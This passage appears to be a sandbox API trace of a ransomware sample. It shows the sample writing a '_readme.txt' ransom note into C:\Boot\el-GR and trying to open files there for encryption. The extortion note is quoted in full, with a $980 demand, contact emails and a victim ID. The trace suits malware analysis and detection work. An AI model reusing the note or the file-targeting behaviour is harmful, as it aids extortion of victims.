hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.508] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0201.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.508] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.508] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.508] PathFindFileNameW (pszPath="") returned="" [0201.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.508] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.509] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.509] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.509] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.509] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0201.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.509] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0201.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.509] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.509] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.510] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.510] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.510] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.510] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.510] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0201.510] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.511] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.511] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.511] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.511] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: 